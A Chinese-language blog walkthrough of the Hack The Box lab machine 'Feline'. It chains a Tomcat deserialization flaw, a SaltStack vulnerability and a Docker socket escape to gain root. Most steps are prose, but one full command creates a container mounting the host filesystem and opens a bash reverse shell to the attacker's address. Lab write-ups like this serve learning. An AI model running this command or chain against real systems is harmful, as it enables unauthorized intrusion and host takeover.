Hack The Box——Feline

最新推荐文章于 2024-05-28 21:06:10 发布
最新推荐文章于 2024-05-28 21:06:10 发布
阅读量1.4w 收藏
点赞数
分类专栏: HackTheBox靶机 文章标签: Hack The Box HTB-Feline 渗透测试实例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/108306250
版权

目录

简介

信息收集

CVE-2020-9484

漏洞发现

任意文件上传

漏洞利用

权限提升

CVE-2020-11651

Docker逃逸

总结

参考文章

简介

该靶机比较难,卡在文件上传无法获得立足点。通过FUZZ获取服务器绝对路径,结合CVE-2020-9484获得WebShell,进而利用Saltstack服务的CVE-2020-11651提升权限为root,然而还在容器里边,最后通过文件映射获取root.txt文件内容,也可通过写入/root/.ssh/authorized_keys文件逃出Docker容器,获取宿主机root权限。

信息收集

快速扫描目标主机端口及服务信息,使用nmap --min-rate 10000 -A -sC -p- -T4 10.10.10.205,发现目标主机开启22,8080,14507端口,分别运行OpenSSH 8.2p1、Apache Tomcat 9.0.27和Nagios NSCA服务,操作系统为Ubuntu,如图:

访问8080端口Web服务,发现这是一个病毒检测网站,如图:

在Service功能存在文件上传点,如图:

扫描网站目录,如图:

页面报错显示Web中间件版本信息,如图:

在Exploit-DB搜索发现CVE-2020-1938等漏洞,如图:

在CVE官方网站搜索tomcat最新CVE编号,如图:

CVE-2020-9484

搜索相关CVE利用方法,发现https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/,但利用该漏洞需要满足三个条件:

  1. 服务器必须配置为使用PersistenceManager

  2. 必须具有上传功能,攻击者可以控制上载的文件名。
  3. 必须知道上传存储位置的路径。

漏洞发现

任意文件上传

尝试上传文件,发现未对文件后缀做限制,如图:

但是未显示上传的文件路径。尝试上传恶意脚本,但未执行,如图:

尝试将文件名置空发现暴露了文件上传路径,如图:

现在需要知道服务器是否使用PersistenceManager。使用ysoserial生成session文件,如图:

上传该文件之后,修改JSESSIONID测试,如图:

服务器使用了PersistenceManager,但本地监听的8888端口没有请求数据。替换Payload,重新上传,然后再次发起请求,如图:

本地监听的8888端口成功获得目标主机发起的HTTP请求,如图:

漏洞利用

将执行的命令替换为反弹Shell的命令,但未成功获得Shell,如图:

尝试先使用curl上传shell脚本到目标主机,然后再执行shell脚本获得目标主机控制权。

构造执行下载命令的cmd.session文件,将该文件上传后发送请求触发反序列化代码,如图:

目标主机成功下载shell脚本,如图:

构造执行shell脚本的session文件,上传后再次发送触发请求,如图:

本地监听的端口成功获得Shell,如图:

权限提升

直接使用提权辅助脚本linpeas.sh,如图:

尝试CVE-2019-13272未成功。查看开放的端口,如图:

查看有终端的用户,如图:

CVE-2020-11651

搜索4505端口发现该端口通常运行Saltstack服务,搜索4506端口发现Saltstack服务CVE-2020-11651漏洞利用相关博客,在GitHub发现POC:https://github.com/jasperla/CVE-2020-11651-poc。使用chisel将目标主机4506端口转发到本地14506端口,如图:

利用CVE-2020-11651漏洞读取文件,如图:

执行反弹Shell的命令,如图:

成功获得root权限,如图:

但未发现root.txt文件。

Docker逃逸

在.bash_history文件发现root用户执行的历史命令,如图:

执行该命令发现返回的Json数据为Docker容器和镜像信息,如图:

本地开启8124端口监听,执行:

curl -s -X POST --unix-socket /var/run/docker.sock -d "{ \"Image\": \"sandbox\", \"cmd\": [\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i >& /dev/tcp/10.10.14.25/8124 0>&1'\\\"\"], \"Binds\": [\"/:/tmp:rw\"] }" -H 'Content-Type: application/json' http://localhost/containers/create?name=nhpt

该命令将基于sandbox镜像创建新的容器nhpt,并将宿主机的目录及文件映射到该容器,如图:

启动该容器,如图:

本地8124端口成功获得root权限的Shell,此时可读写宿主机文件,如图:

总结

 卡在了文件上传那里久久不能解决,论坛的提示也没想明白,只好等机器退役后跟着大佬的博客学习一下。

参考文章

  • https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/

  • https://idiothacker.com/hackthebox-walkthrough-feline/
  • https://0xdf.gitlab.io/2021/02/20/htb-feline.html
江左盟宗主
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack The Box:Blue靶场
知柯信安
11-25 1314
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
feline点云模型
04-11
feline点云模型。最上面是点数和面数。 经典的CG模型。 比较简单直观。
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
hack the box archetype靶场
最新发布
qq_42754807的博客
05-28 812
hack the box archetype
Hack The Box——Luanne
热门推荐
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
Nibbles - Hack the box
neal1991的专栏
03-17 459
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
Hack the box: Bastion
neal1991的专栏
10-10 1274
介绍目标:10.10.10.134 (Windows)Kali:10.10.16.65In conclusion, Bastion is not a medium box...
feline:Feline,一种连接编程语言(Windows和Linux x86-64)。 早些年
05-08
猫科动物0.0.0.64 2021年3月1日Feline是一种结合了Forth,Joy和Factor精神的连接编程语言。 猫科动物只能在x86-64Linux和Windows上运行(该实现方式大多以x86-64汇编语言编写)。 如果您安装了正确的工具(GNU Make...
feline.nvim:用Lua编写的Neovim的最小,时尚和可自定义状态行
04-16
但是对于那些只想完成工作的人,Feline还提供了默认状态线,该状态线应适合大多数人的需求。特征使用方便。 完全可定制的每个组件。 内置提供程序,用于vi模式,文件信息,文件大小,光标位置,诊断(使用 ),git...
Feline-for-Product-Hunt:一个漂亮的,非正式的产品搜寻应用程式
05-23
:warning: 注意:此存储库未维护 :warning:寻找产品的猫科动物非官方的搜寻下载图片 :red_exclamation_mark: 已知的问题不幸的是,我们目前没有对Product Hunt API的写权限。...贡献可以在添加功能请求,错误和想法。...
feline_warfare:一个选择你自己的冒险游戏,背景是充满邪恶激光猫的后世界末日城市荒地
06-20
在 JSC 中运行猫战猫战的早期版本(由单个激光猫战组成)是为 CodeAcademy 编写的,它利用一些自定义函数(提示)来获取用户输入,从你的终端运行这个游戏,使用它的“jsc”版本: jsc feline_war_jsc.js在 Mac 上,...
Hack The Box - Access Writeup
qq_23026851的博客
01-23 1284
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗。收获还是很大,在此记录一下,以便后阅。 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21(FTP),23(telnet),80(HTTP)。80端口是迷惑信息,先尝试利用FTP。 但是因为不知道登陆FTP的账号密码,这里也卡了很久TAT。后来才发现有anonymous登陆这种操作。上...
Hack The Box——ServMon
江左盟的博客
06-19 638
简介 信息收集 使用 漏洞发现 漏洞利用 权限提升 总结
HackTheBox-Hackerman
网安星空
02-20 351
HackTheBox网站CTF靶场杂项(Misc)相关题目Hackerman,主要知识点为图片的隐写术。
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6529
Hack The Box,一款有意思的渗透测试平台
Hack the box Oopsie
qq_41696858的博客
07-03 358
1.靶机IP 10.10.10.28,常规nmap -sC -sV 10.10.10.28扫端口,扫出22和80端口 2.打开浏览器,访问80端口,页面上没有啥,查看源码,找到/cdn-cgi/login,找到后台登录入口 3.登录,用户名 admin 密码没啥特别提示,尝试上一台靶机的密码,果然一样 4.后台四个模块,account模块管理账户信息,uploads上传文件 看见uploads,就知道找到了shell上传点,点开需要super_admin权限,通过抓包发现,其实是通过cookie里面的use
HackTheBox-Jeeves
网安星空
01-10 459
HackTheBox 网站CTF靶场PWN相关题目Jeeves,主要知识点为缓冲区溢出
Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
Hack The Box -----------------------Waldo
大方子
12-16 1323
这次的靶机是Hachthebox的靶机 IP地址为:10.10.10.87 ================================================================================================ 先用Nmap对目标机器进行扫描  nmap  -sV 10.10.10.87 -sT -o hawk.txt 然后我...
Implement feline_fixes, which is a diff function that returns the minimum number of edit operations needed to transform the start word into the goal word. There are three kinds of edit operations: Add a letter to start, Remove a letter from start, Substitute a letter in start for another. Each edit operation contributes 1 to the difference between two words.
06-01
Sure, here's the implementation of the `feline_fixes` function in Python: ```python def feline_fixes(start, goal): m, n = len(start), len(goal) dp = [[0] * (n + 1) for _ in range(m + 1)] for i ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值